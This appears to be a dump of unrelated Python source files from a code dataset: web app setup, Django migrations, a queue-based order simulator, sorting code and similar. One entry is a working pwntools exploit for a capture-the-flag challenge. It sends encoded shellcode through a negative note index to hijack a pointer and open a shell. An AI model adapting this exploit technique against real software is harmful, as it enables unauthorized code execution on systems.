text stringlengths 38 1.54M |
|---|
class Solution:
def sumOddLengthSubarrays(self, arr: List[int]) -> int:
res = 0
for n in range(1, len(arr)+1, 2):
for i in range(len(arr)-n+1):
res += sum(arr[i:i+n])
return res
|
import logging
from fastapi import FastAPI
from starlette.staticfiles import StaticFiles
from app.api import ping, summaries
from app.db import init_db
from app.views import home
log = logging.getLogger("uvicorn")
def create_application() -> FastAPI:
application = FastAPI()
application.mount("/app/static", StaticFiles(directory="app/static"), name="static")
application.include_router(ping.router)
application.include_router(
summaries.router, prefix="/summaries", tags=["summaries"]
)
application.include_router(home.router)
return application
app = create_application()
@app.on_event("startup")
async def startup_event():
log.info("Starting up...")
init_db(app)
@app.on_event("shutdown")
async def shutdown_event():
log.info("Shutting down...")
|
from flask import Flask, render_template
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from config import config
from flask_login import LoginManager
from sqlalchemy import MetaData, func
from flask_cors import CORS
# Format currency function for jinja templates (Put this in import)
def format_currency(value):
return "${:,.2f}".format(float(value)/100)
# Allows naming constraints to smooth db migrations
convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(column_0_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
metadata = MetaData(naming_convention=convention)
db = SQLAlchemy(metadata=metadata)
bootstrap = Bootstrap()
moment = Moment()
# flask login global variables
login_manager = LoginManager()
login_manager.login_view = 'auth.login' # sets the view to redirect when non-logged in user tries to access protected page
# Application factory function
def create_app(config_name):
app = Flask(__name__)
CORS(app)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
app.jinja_env.globals.update(format=format_currency)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
return app
|
from __future__ import print_function
import boto3
import json
print('Invoking updatePizzaMenu function')
def lambda_handler(event, context):
print ('printing event and context')
print (event)
print (event['menu_id'])
table = boto3.resource('dynamodb').Table('Menus')
table.update_item(
Key={
'menu_id': event['menu_id']
},
UpdateExpression='SET selection = :val1',
ExpressionAttributeValues={
':val1': event['selection']
}
)
return 200 |
# Представлен список чисел. Необходимо вывести элементы исходного списка, значения которых больше предыдущего элемента.
# Подсказка: элементы, удовлетворяющие условию, оформить в виде списка. Для формирования списка использовать генератор.
# Пример исходного списка: [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55].
# Результат: [12, 44, 4, 10, 78, 123].
import random
def Bigger_Elements(Array, N):
for i in range(1, N - 1, 1):
if Array[i] > Array[i - 1]:
print(Array[i], end=" ")
if __name__ == '__main__':
Array = list(range(1, 100))
random.shuffle(Array)
N = len(Array)
Bigger_Elements(Array, N) |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-06-03 02:40
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import leprikon.models.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("leprikon", "0060_transactions"),
]
operations = [
migrations.CreateModel(
name="RefundRequest",
fields=[
("id", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
(
"requested",
models.DateTimeField(
default=django.utils.timezone.now, editable=False, verbose_name="requested time"
),
),
("bank_account", leprikon.models.fields.BankAccountField(verbose_name="bank account number")),
(
"registration",
models.OneToOneField(
on_delete=django.db.models.deletion.PROTECT,
related_name="refund_request",
to="leprikon.SubjectRegistration",
verbose_name="registration",
),
),
(
"requested_by",
models.ForeignKey(
editable=False,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="requested by",
),
),
],
options={
"verbose_name": "refund request",
"verbose_name_plural": "refund requests",
"ordering": ("requested",),
},
),
]
|
from __future__ import print_function
import subprocess
import os
import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('base',
help='location of directory containing larpix-scripts, '
'larpix-control, etc.')
args = parser.parse_args()
def git_describe(directory):
current_dir = os.getcwd()
os.chdir(directory)
output = subprocess.check_output(['git', 'describe', '--always',
'--long'])
os.chdir(current_dir)
return output.decode()
def git_diff(directory):
current_dir = os.getcwd()
os.chdir(directory)
output = subprocess.check_output(['git', 'diff'])
os.chdir(current_dir)
return output.decode()
def pip_show(package):
output = subprocess.check_output(['pip', 'show', package])
return output.decode()
to_save = []
print('Preparing bug report')
print('Collecting system info')
to_save.append('Platform: ' + sys.platform)
current_dir = os.getcwd()
os.chdir(args.base)
to_save.append('larpix-control HEAD: ' + git_describe('larpix-control'))
to_save.append('larpix-control diff:\n' + git_diff('larpix-control'))
to_save.append('larpix-scripts HEAD: ' + git_describe('larpix-scripts'))
to_save.append('larpix-scripts diff:\n' + git_diff('larpix-scripts'))
to_save.append('pip show larpix-control:\n' +
pip_show('larpix-control'))
to_save.append('pip show larpix-geometry:\n' +
pip_show('larpix-geometry'))
os.chdir(current_dir)
outfile = 'bugreport.txt'
with open(outfile, 'w') as f:
print('Saving to: ' + os.path.abspath(f.name))
f.write('\n'.join(to_save))
|
from app import db
from app.main import bp
from flask import render_template, request, redirect, jsonify
from flask_login import login_required, current_user
from app.main.forms import CreateOrder
from app.models import OrderTypes, Tag, Order
from werkzeug.utils import secure_filename
from config import Config
import os
import subprocess
import random
import speech_recognition as sr
import json
@bp.route('/', methods=['GET', 'POST'])
@login_required
def index():
title = 'Главная'
# Я поставил
orders_iam_creator = current_user.get_orders_iam_creator()
# Мне поставили
orders_iam_executor = current_user.get_orders_iam_executor()
create_order_form = CreateOrder()
for order_type in OrderTypes.query.all():
create_order_form.type.choices.append((str(order_type.id), order_type.title))
for tag in Tag.query.all():
create_order_form.executors.choices.append((str(tag.id), tag.name))
if create_order_form.validate_on_submit():
all_fields = request.form
custom_fields = {}
for field in all_fields:
if 'field' in field.split('-'):
custom_fields[field.split('-')[0]] = all_fields[field]
order = Order()
order.creator = current_user.id
order.title = create_order_form.title.data
order.description = create_order_form.description.data
order.description_sound = create_order_form.file.data
order.priority = create_order_form.priority.data
order.type = create_order_form.type.data
order.interval = create_order_form.interval.data
order.deadline = create_order_form.deadline.data
order.status = 1
tag = Tag.query.filter(Tag.id == create_order_form.executors.data).first()
for user in tag.users:
order.executors.append(user)
order.reactions = json.dumps(custom_fields)
db.session.add(order)
db.session.commit()
return redirect(request.referrer)
return render_template('main/index.html',
title=title,
create_order_form=create_order_form,
orders_iam_creator=orders_iam_creator,
orders_iam_executor=orders_iam_executor)
@bp.route('/recognize_file', methods=['GET', 'POST'])
def recognize_file():
if request.method == 'POST':
# print(request.files)
voice_rec = request.files['audio'] # надо взять аудиофайл из POST запроса
rand = str(random.randint(100000,1000000))
filename = rand + secure_filename(voice_rec.filename)
voice_rec.save(os.path.join(Config.UPLOAD_FOLDER, filename))
subprocess.run(['ffmpeg', '-i', os.path.join(Config.UPLOAD_FOLDER, filename), os.path.join(Config.UPLOAD_FOLDER, filename.replace('ogg', 'wav'))])
with sr.AudioFile(os.path.join(Config.UPLOAD_FOLDER, filename.replace('ogg', 'wav'))) as s:
r = sr.Recognizer()
txt = r.listen(s)
text = r.recognize_google(txt, language = 'ru-RU')
return jsonify({'stt': text, 'file_id': int(rand)})
|
# card data comes from:
# http://hearthstonejson.com/
# last updated: August 7th, 2014
# mechanics: Taunt, Stealth, Divine Shield, Windfury, Freeze, Enrage,
# HealTarget, Charge, Deathrattle, Aura, Combo, AdjacentBuff, Battlecry,
# Poisonous, Spellpower
from json import loads
from card_types import MinionCard, SpellCard
def get_all_cards():
raw_cards = loads(open('AllSets.json').read())
cards = []
for val in raw_cards.values():
cards += val
return cards
def card_id_map():
raw_cards = loads(open('AllSets.json').read())
cards = {}
for card_chunk in raw_cards.values():
for card in card_chunk:
cards[card['id']] = card
return cards
cards = get_all_cards()
def get_card(card_name, owner):
for card in cards:
if card.get('name') == card_name:
params = {'name': card.get('name'),
'neutral_cost': card.get('cost', 0),
'owner': owner,
'card_id': card.get('id')}
if card.get('type') == 'Minion':
params['attack'] = card.get('attack')
params['health'] = card.get('health')
params['mechanics'] = card.get('mechanics', [])
params['race'] = card.get('race')
return MinionCard(**params)
elif card.get('type') == 'Spell':
return SpellCard(**params)
elif card.get('type') == 'Weapon':
params['attack'] = card.get('attack')
params['durability'] = card.get('durability')
return WeaponCard(**params)
print('ERROR: CARD NOT FOUND')
def get_deck(names, owner):
return [get_card(name, owner) for name in names]
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding=utf-8
class RequestBase:
def __init__(self):
self.method = ""
self.request_id = None
def set_req_info(self, req_info):
if req_info is not None:
if req_info.request_id is not None:
self.request_id = req_info.request_id
class ResponseBase():
def __init__(self):
self.status = -1
self.header = {}
self.error_data = ""
def get_requestid(self):
return self.header.get("x-mns-request-id")
class BatchReceiveMessageRequest(RequestBase):
def __init__(self, queue_name, batch_size, base64decode = True, wait_seconds = -1):
RequestBase.__init__(self)
self.queue_name = queue_name
self.batch_size = batch_size
self.base64decode = base64decode
self.wait_seconds = wait_seconds
self.method = "GET"
class ReceiveMessageResponseEntry():
def __init__(self):
self.dequeue_count = -1
self.enqueue_time = -1
self.first_dequeue_time = -1
self.message_body = ""
self.message_id = ""
self.message_body_md5 = ""
self.priority = -1
self.next_visible_time = ""
self.receipt_handle = ""
class BatchReceiveMessageResponse(ResponseBase):
def __init__(self):
ResponseBase.__init__(self)
self.message_list = []
class BatchDeleteMessageRequest(RequestBase):
def __init__(self, queue_name, receipt_handle_list):
RequestBase.__init__(self)
self.queue_name = queue_name
self.receipt_handle_list = receipt_handle_list
self.method = "DELETE"
class BatchDeleteMessageResponse(ResponseBase):
def __init__(self):
ResponseBase.__init__(self)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import defaultdict
import codecs, re
def load_analogy_pair(fname):
ap_dict = defaultdict(list)
with codecs.open(fname, 'r', encoding='utf-8', errors='ignore') as f:
for i, line in enumerate(re.split('[\r\n]+', f.read())):
if len(line.strip()) > 0:
tokens = re.split(r'\t', line.strip())
for token in re.split(r' ', tokens[1]):
if tokens[0] == 'pairs':
ap_dict[tokens[0]].append(tuple(re.split(r'/', token)))
else:
ap_dict[tokens[0]].append(token)
return ap_dict['pairs'], ap_dict['neutral_words']
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 15 00:52:59 2021
@author: glenn
"""
#%% - import libraries
import pandas
import time
import pickle
from local_module import fcts
#%% input / output paths
RAW_CASE_DATA = 'raw_cases/conposcovidloc.csv'
SORTED_CASES = 'pickled_cases/sorted_data_per_region.obj'
REGION_LABELS = 'pickled_cases/region_labels.obj'
#%% - read the case data into pandas dataframe
phuDailys = pandas.read_csv(RAW_CASE_DATA)
phuDailys['Date'] = pandas.to_datetime(phuDailys['Accurate_Episode_Date']).dt.date
phu_df = phuDailys[['Reporting_PHU_ID', 'Outcome1', 'Date']]
#%% - find all distinct region labels
region_labels = list(set(phu_df['Reporting_PHU_ID']))
num_regions = len(region_labels)
#%% - insert case reports from raw case data into lists per region
# - computationally expensive, this cell may take more than 10 minutes (1061 seconds)
t0 = time.perf_counter()
data = dict()
for region in region_labels:
data[region] = list()
for region in region_labels:
for row in phu_df.iterrows():
if(row[1]['Reporting_PHU_ID']==region):
data[region].append(row[1])
t1 = time.perf_counter()
print('cell took ', str(t1 - t0), ' seconds to complete')
#%% - sort all in the dict by case by date
for region in data:
dataset = data[region]
# dataset is a list of pandas series objects that need to be sorted by date
dataset.sort(key=fcts.pd_series_date)
#%% - Save sorted data to pickled object
with open(SORTED_CASES, 'wb') as f:
pickle.dump(data, f)
#%% - save region label to pickled object
with open(REGION_LABELS, 'wb') as f:
pickle.dump(region_labels, f)
|
from pwn import *
#context.arch = "amd64"
p = remote("chall.pwnable.tw",10201)
#p = process("./death_note")
def add(idx,name):
p.sendlineafter("Your choice :","1")
p.sendlineafter("Index :",str(idx))
p.sendlineafter("Name :",str(name))
def show(idx):
p.sendlineafter("Your choice :","2")
p.sendlineafter("Index :",str(idx))
def delete(idx):
p.sendlineafter("Your choice :","3")
p.sendlineafter("Index :",str(idx))
def exit():
p.sendlineafter("Your choice :","4")
shellcode = asm("pop ebp;pop ebx;push 0x7e;pop eax;inc eax;inc eax;xor [ebx+0x2a],eax;xor [ebx+0x2b],eax;push ecx;pop eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;")
#shellcode = asm("pop ebp;pop ebx;pop eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax;inc eax; push 0x7e;pop edx;inc edx;inc edx;xor [ebx+0x2b],edx;xor [ebx+0x2c],edx;pop edx;pop edx;pop edx;pop edx;")
add(0,"/bin/sh\x00")
add(-19,shellcode + "M")
#gdb.attach(p)
delete(0)
p.interactive()
|
{'application':{'type':'Application',
'name':'StackWidgetsTest',
'backgrounds': [
{'type':'Background',
'name':'bgWidgets',
'title':'Widgets Test',
'size':(800, 600),
'menubar': {'type':'MenuBar',
'menus': [
{'type':'Menu',
'name':'File',
'label':'&File',
'items': [
{'type':'MenuItem',
'name':'menuFileDumpWidgets',
'label':'Create Components Docs...',
},
{'type':'MenuItem',
'name':'menuFileExit',
'label':'E&xit\tAlt+X',
'command':'exit',
},
]
},
]
},
'components': [
{'type':'ToggleButton',
'name':'chkToggleButton',
'position':(100, 225),
'size':(85, -1),
'label':'ToggleButton',
},
{'type':'StaticText',
'name':'labelToggleButton',
'position':(5, 230),
'text':'ToggleButton:',
},
{'type':'StaticText',
'name':'labelBitmapCanvas',
'position':(476, 496),
'text':'BitmapCanvas:',
},
{'type':'BitmapCanvas',
'name':'bmpBitmapCanvas',
'position':(566, 494),
'size':(112, 50),
'backgroundColor':(255, 255, 255),
},
{'type':'StaticText',
'name':'labelHtmlWindow',
'position':(546, 264),
'text':'HtmlWindow:',
},
{'type':'HtmlWindow',
'name':'htmHtmlWindow',
'position':(540, 288),
'size':(195, 150),
'backgroundColor':(255, 255, 255),
'text':'widgets.html',
},
{'type':'StaticBox',
'name':'stbStaticBox',
'position':(563, 449),
'size':(116, 32),
'label':'A StaticBox',
},
{'type':'StaticText',
'name':'labelStaticBox',
'position':(498, 460),
'text':'StaticBox:',
},
{'type':'StaticText',
'name':'labelSpinner',
'position':(228, 450),
'text':'Spinner:',
},
{'type':'Spinner',
'name':'spnSpinner',
'position':(310, 450),
'max':100,
'min':1,
'value':93,
},
{'type':'StaticText',
'name':'labelGauge',
'position':(228, 408),
'text':'Gauge:',
},
{'type':'Gauge',
'name':'gagGauge',
'position':(310, 404),
'size':(128, -1),
'layout':'horizontal',
'max':100,
'value':50,
},
{'type':'Calendar',
'name':'calCalendar',
'position':(299, 200),
},
{'type':'StaticText',
'name':'labelCalendar',
'position':(228, 260),
'text':'Calendar:',
},
{'type':'ComboBox',
'name':'cmbComboBox',
'position':(311, 364),
'size':(125, -1),
'items':['one', 'two', 'three'],
'stringSelection':'two',
'text':'two',
},
{'type':'StaticText',
'name':'labelComboBox',
'position':(228, 370),
'text':'ComboBox:',
},
{'type':'StaticBox',
'name':'StaticBox1',
'position':(543, 10),
'size':(250, 242),
'label':'Attributes',
},
{'type':'StaticLine',
'name':'staticMenuUnderline',
'position':(0, 0),
'size':(800, -1),
'layout':'horizontal',
},
{'type':'CheckBox',
'name':'chkEnabled',
'position':(550, 30),
'checked':True,
'label':'Enabled',
},
{'type':'CheckBox',
'name':'chkVisible',
'position':(550, 50),
'checked':True,
'label':'Visible',
},
{'type':'CheckBox',
'name':'chkEditable',
'position':(550, 70),
'checked':True,
'label':'Editable',
},
{'type':'Button',
'name':'btnBackgroundColor',
'position':(550, 95),
'label':'BackgroundColor',
},
{'type':'Button',
'name':'btnForegroundColor',
'position':(550, 125),
'label':'ForegroundColor',
},
{'type':'Button',
'name':'btnFont',
'position':(550, 155),
'label':'Font',
},
{'type':'Button',
'name':'btnToolTip',
'position':(550, 185),
'label':'ToolTip',
},
{'type':'Button',
'name':'btnBgBackgroundColor',
'position':(550, 215),
'label':'Background BackgroundColor',
},
{'type':'StaticText',
'name':'labelButton',
'position':(5, 5),
'text':'Button:',
},
{'type':'StaticText',
'name':'labelTextField',
'position':(5, 35),
'text':'TextField:',
},
{'type':'StaticText',
'name':'labelPasswordField',
'position':(5, 65),
'text':'PasswordField:',
},
{'type':'StaticText',
'name':'labelTextArea',
'position':(5, 95),
'text':'TextArea:',
},
{'type':'StaticText',
'name':'labelStaticText',
'position':(5, 170),
'text':'StaticText:',
},
{'type':'StaticText',
'name':'labelCheckBox',
'position':(5, 200),
'text':'CheckBox:',
},
{'type':'StaticText',
'name':'labelRadioGroup',
'position':(5, 260),
'text':'RadioGroup:',
},
{'type':'StaticText',
'name':'labelChoice',
'position':(5, 360),
'text':'Choice:',
},
{'type':'StaticText',
'name':'labelList',
'position':(5, 390),
'text':'List:',
},
{'type':'StaticText',
'name':'labelSlider',
'position':(5, 490),
'text':'Slider:',
},
{'type':'StaticText',
'name':'labelStaticLine',
'position':(5, 520),
'text':'StaticLine:',
},
{'type':'StaticText',
'name':'labelImage',
'position':(315, 5),
'text':'Image:',
},
{'type':'StaticText',
'name':'labelImageButton',
'position':(315, 110),
'text':'ImageButton:',
},
{'type':'TextField',
'name':'fldTextFieldNoBorder',
'position':(315, 150),
'size':(180, -1),
'border':'none',
'text':'TextField with no border',
},
{'type':'Button',
'name':'btnButton',
'position':(100, 4),
'label':'Button',
},
{'type':'TextField',
'name':'fldTextField',
'position':(100, 32),
'size':(180, -1),
},
{'type':'PasswordField',
'name':'fldPasswordField',
'position':(100, 62),
'size':(180, -1),
},
{'type':'TextArea',
'name':'fldTextArea',
'position':(100, 92),
'size':(180, 60),
'text':'Use the checkboxes and buttons on the right to set the attributes of the widgets on the left.\n\nThe editable attribute only applies to TextField, PasswordFiled, and TextArea.',
},
{'type':'StaticText',
'name':'txtStaticText',
'position':(100, 170),
'text':'StaticText',
},
{'type':'CheckBox',
'name':'chkCheckBox',
'position':(100, 200),
'label':'CheckBox',
},
{'type':'RadioGroup',
'name':'radRadioGroup',
'position':(100, 260),
'items':['one', 'two', 'three'],
'label':'A RadioBox',
'layout':'vertical',
'max':1,
'stringSelection':'one',
},
{'type':'Choice',
'name':'popChoice',
'position':(100, 360),
'items':['one', 'two', 'three'],
'stringSelection':'two',
},
{'type':'List',
'name':'lstList',
'position':(100, 390),
'size':(-1, 70),
'items':['one', 'two', 'three'],
'stringSelection':'three',
},
{'type':'Slider',
'name':'sldSlider',
'position':(100, 490),
'size':(200, 20),
'layout':'horizontal',
'max':100,
'min':1,
'value':1,
},
{'type':'StaticLine',
'name':'linStaticLine',
'position':(100, 520),
'size':(200, -1),
'layout':'horizontal',
},
{'type':'ImageButton',
'name':'imgImageButton',
'position':(405, 110),
'border':'transparent',
'file':'edit.gif',
},
{'type':'Image',
'name':'imgImage',
'position':(385, 5),
'file':'tile.bmp',
},
] # end components
} # end background
] # end backgrounds
} }
|
# Generated by Django 2.1.1 on 2018-10-08 08:36
import DjangoUeditor.models
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('polls', '0012_customerappraise'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'verbose_name': '资讯内容页', 'verbose_name_plural': '资讯内容页'},
),
migrations.AlterModelOptions(
name='consult',
options={'verbose_name': '客户咨询', 'verbose_name_plural': '客户咨询'},
),
migrations.AlterModelOptions(
name='mainmanu',
options={'verbose_name': '一级分类菜单', 'verbose_name_plural': '一级分类菜单'},
),
migrations.AlterModelOptions(
name='product',
options={'verbose_name': '产品内容页', 'verbose_name_plural': '产品内容页'},
),
migrations.AlterModelOptions(
name='secondarymanu',
options={'verbose_name': '二级分类菜单', 'verbose_name_plural': '二级分类菜单'},
),
migrations.AlterField(
model_name='customerappraise',
name='customer_appraise',
field=models.CharField(max_length=2000, verbose_name='评价内容'),
),
migrations.AlterField(
model_name='customerappraise',
name='customer_logo',
field=models.ImageField(upload_to='customers', verbose_name='客户LOGO'),
),
migrations.AlterField(
model_name='product',
name='content',
field=DjangoUeditor.models.UEditorField(blank=True, verbose_name='内容'),
),
migrations.AlterField(
model_name='product',
name='mainPhoto',
field=models.ImageField(upload_to='products', verbose_name='上传主图'),
),
migrations.AlterField(
model_name='product',
name='mainmanu',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='polls.MainManu', verbose_name='选择一级类目'),
),
migrations.AlterField(
model_name='product',
name='pub_date',
field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='发布日期'),
),
migrations.AlterField(
model_name='product',
name='secondarymanu',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='polls.SecondaryManu', verbose_name='选择二级类目'),
),
migrations.AlterField(
model_name='product',
name='update_date',
field=models.DateTimeField(auto_now=True, verbose_name='更新日期'),
),
]
|
import time
import queue
import threading
from SQS import *
ingredientes = {"Guacamole": 500, "Cebolla": 500, "Cilantro": 500, "Frijoles": 500, "Salsa": 500}
responseTimes = {"Pequeño": [], "Mediano": [], "Grande": []}
tortillas = [500, 500, 500]
# Global queues
queue_asada_tripa = queue.Queue()
queue_adobada_lengua = queue.Queue()
queue_cabeza_suadero_veggie = queue.Queue()
orders_in_progress = {}
distributed_orders = {}
# Orders in progess format, see order_in_proges_format.txt in extras
# Thread resource lock
lock = threading.Lock()
def rellenarIngredientes():
while True:
time.sleep(5)
lock.acquire()
short_ingredient = min(ingredientes, key=ingredientes.get)
if ingredientes[short_ingredient] <= 450:
ingredientes[short_ingredient] += 50
tortillas[0] += 5
tortillas[1] += 5
tortillas[2] += 5
lock.release()
def mesero(listaOrdenes):
"""Takes orders and submits them to appropriate queue"""
while True:
print("Mesero", len(listaOrdenes))
if len(listaOrdenes) > 0:
orden = listaOrdenes.pop(0)
distributed_orders[orden["request_id"]] = orden
orders_in_progress[orden["request_id"]] = {
"size": len(orden["orden"]),
"start_time": orden["datetime"],
"steps": [],
}
for suborder in orden["orden"]:
orders_in_progress[orden["request_id"]][suborder["part_id"]] = {
"finish_state": False,
"quantity": suborder["quantity"]
}
meat_type = suborder["meat"]
print(meat_type)
if meat_type == "Asada" or meat_type == "Tripa":
queue_asada_tripa.put(suborder)
elif meat_type == "Adobada" or meat_type == "Lengua":
queue_adobada_lengua.put(suborder)
else:
queue_cabeza_suadero_veggie.put(suborder)
time.sleep(1)
def taquero1(orderQueue):
"""Takes orders from correspoding queue and processes them."""
while True:
processed_order = processOrder(orderQueue.get())
if not processed_order[1]:
orderQueue.put(processed_order[0])
time.sleep(2)
def processOrder(order):
order_id = order["part_id"][:36]
suborder_id = order["part_id"]
"""Process order, add steps to response"""
tacos_made = 5
addStep(order, 1)
meat_type = order["meat"]
for ingrediente in order["ingredients"]:
if ingredientes[ingrediente] < tacos_made:
if meat_type == "Asada" or meat_type == "Tripa":
if tortillas[0] < tacos_made:
addStep(order, 3)
return [order, False]
elif meat_type == "Adobada" or meat_type == "Lengua":
if tortillas[1] < tacos_made:
addStep(order, 3)
return [order, False]
else:
if tortillas[2] < tacos_made:
addStep(order, 3)
return [order, False]
addStep(order, 3)
return [order, False] # Skips order, next one might not use the missing ingredient, minimizing downtime
if meat_type == "Asada" or meat_type == "Tripa":
lock.acquire()
tortillas[0] -= tacos_made
lock.release()
elif meat_type == "Adobada" or meat_type == "Lengua":
lock.acquire()
tortillas[1] -= tacos_made
lock.release()
else:
lock.acquire()
tortillas[2] -= tacos_made
lock.release()
for ingrediente in order["ingredients"]:
lock.acquire()
ingredientes[ingrediente] -= tacos_made # Use up 1 unit per taco
lock.release()
if orders_in_progress[order_id][suborder_id]["quantity"] > 0: # Remove tacos from order
if orders_in_progress[order_id][suborder_id]["quantity"] < tacos_made:
orders_in_progress[order_id][suborder_id]["quantity"] = 0
else:
orders_in_progress[order_id][suborder_id]["quantity"] -= tacos_made
if orders_in_progress[order_id][suborder_id]["quantity"] < 1:
print("FINISHED ------------------")
addStep(order, 4)
print(orders_in_progress)
order_id = order["part_id"][:36]
lock.acquire()
orders_in_progress[order_id]["size"] -= 1
lock.release()
if orders_in_progress[order_id]["size"] == 0:
# Delete the order from SQS using the receipt handle
receipt = distributed_orders[order_id]["ReceiptHandle"]
distributed_orders[order_id]["ReceiptHandle"] = "Deleted"
# deleteSQS(receipt)
print("DELETE", receipt)
sendResponse(order)
lock.acquire()
orders_in_progress.pop(order_id)
lock.release()
return [order, True]
addStep(order, 2)
return [order, False]
def addStep(order, state):
# 1 - Running, 2 - Paused, 3 - Missing ingredient, 4 - Finished
current_state = []
if state == 1:
current_state = ["Running", "Working on order"]
elif state == 2:
current_state = ["Suspended", "Next order"]
elif state == 3:
current_state = ["Suspended", "Waiting on ingredient"]
elif state == 4:
current_state = ["Finished", "Order finished"]
else:
current_state = ["Unknown", "Unknown"]
order_id = order["part_id"][:36]
suborder_id = order["part_id"]
lock.acquire()
next_step = len(orders_in_progress[order_id]["steps"]) + 1
now = time.strftime("%Y-%m-%d %H:%M:%S")
orders_in_progress[order_id]["steps"].append({
"step": next_step,
"state": current_state[0],
"action": current_state[1],
"part_id": suborder_id,
"startTime": now
})
lock.release()
if next_step > 1:
orders_in_progress[order_id]["steps"][next_step-2].update({"endTime":now})
if state == 4:
orders_in_progress[order_id]["steps"][next_step-1].update({"endTime":now})
def sendResponse(order):
# TODO: Send response to sqs based on order in progress info
print()
order_stats = orders_in_progress[order["part_id"][:36]]
message = {"answer":{
"start_time":order_stats["start_time"],
"end_date": order_stats["steps"][-1]["endTime"],
"steps":order_stats["steps"]
}}
message.update(distributed_orders[order["part_id"][:36]])
print(message)
message = json.dumps(message)
# putSQS(message)
|
# Display all patterns in Golly's Patterns folder.
# Author: Andrew Trevorrow (andrew@trevorrow.com), March 2006.
import golly as g
import os
from os.path import join
from time import sleep
# ------------------------------------------------------------------------------
def slideshow ():
oldalgo = g.getalgo()
oldrule = g.getrule()
message = "Hit space to continue or escape to exit the slide show..."
g.show(message)
for root, dirs, files in os.walk(g.getdir("app") + "Patterns"):
for name in files:
if name.startswith("."):
# ignore hidden files (like .DS_Store on Mac)
pass
else:
g.new("")
g.setalgo("QuickLife") # nicer to start from this algo
fullname = join(root, name)
g.open(fullname, False) # don't add file to Open/Run Recent submenu
g.update()
if name.endswith(".lua") or name.endswith(".py"):
# reshow message in case it was changed by script
g.show(message)
while True:
event = g.getevent()
if event == "key space none": break
g.doevent(event) # allow keyboard/mouse interaction
sleep(0.01) # avoid hogging cpu
# if all patterns have been displayed then restore original algo and rule
# (don't do this if user hits escape in case they want to explore pattern)
g.new("untitled")
g.setalgo(oldalgo)
g.setrule(oldrule)
# ------------------------------------------------------------------------------
# show status bar but hide other info to maximize viewport
oldstatus = g.setoption("showstatusbar", True)
oldtoolbar = g.setoption("showtoolbar", False)
oldlayerbar = g.setoption("showlayerbar", False)
oldeditbar = g.setoption("showeditbar", False)
oldfiles = g.setoption("showfiles", False)
try:
slideshow()
finally:
# this code is always executed, even after escape/error;
# clear message line in case there was no escape/error
g.show("")
# restore original state
g.setoption("showstatusbar", oldstatus)
g.setoption("showtoolbar", oldtoolbar)
g.setoption("showlayerbar", oldlayerbar)
g.setoption("showeditbar", oldeditbar)
g.setoption("showfiles", oldfiles)
|
"""Merge sort algorithm."""
def merge_sort(a_list):
"""Use MS to sort the provided list and return it."""
if not isinstance(a_list, list):
raise TypeError("Only list is a valid input type!")
if len(a_list) < 2:
return a_list
parts = [[i] for i in a_list]
while len(parts) > 1:
if len(parts[0]) == len(parts[1]) or len(parts) == 2:
parts.insert(0, _merge(parts.pop(0), parts.pop(0)))
else:
parts.insert(0, _merge(parts.pop(0), _merge(parts.pop(0), parts.pop(0))))
return parts[0]
def _merge(part_a, part_b):
"""."""
temp = []
while part_a and part_b:
if part_a[0] <= part_b[0]:
temp.append(part_a.pop(0))
else:
temp.append(part_b.pop(0))
while part_a:
temp.append(part_a.pop(0))
while part_b:
temp.append(part_b.pop(0))
return temp
if __name__ == '__main__': # pragama: no cover
import timeit as ti
import random
best_case = [1, 2, 3, 4, 5]
worst_case = [5, 4, 3, 2, 1]
random = [random.randint(1, 100) for i in range(10)]
time_1 = ti.timeit("merge_sort(best_case)",
setup="from __main__ import best_case, merge_sort")
time_2 = ti.timeit("merge_sort(worst_case)",
setup="from __main__ import worst_case, merge_sort")
time_3 = ti.timeit("merge_sort(random)",
setup="from __main__ import random, merge_sort")
print("""
Mergesort sorts shit by merging it.
Input:[1, 2, 3, 4, 5]
Sort time: {}
Input:[5, 4, 3, 2, 1]
Sort time: {}
Input:list(range(5, 0, -1))
Sort time: {}
""".format(time_1, time_2, time_3)) |
import urllib.request
import os
import sys
def downloadImages(strQueryString, arrUrls):
for url in arrUrls:
downloadImage(strQueryString, url)
def downloadImage(strQueryString, url):
try:
strPath = setup(strQueryString)
print(f"Downloading {url} to {strQueryString}")
image_name = str(url).split('/')[-1]
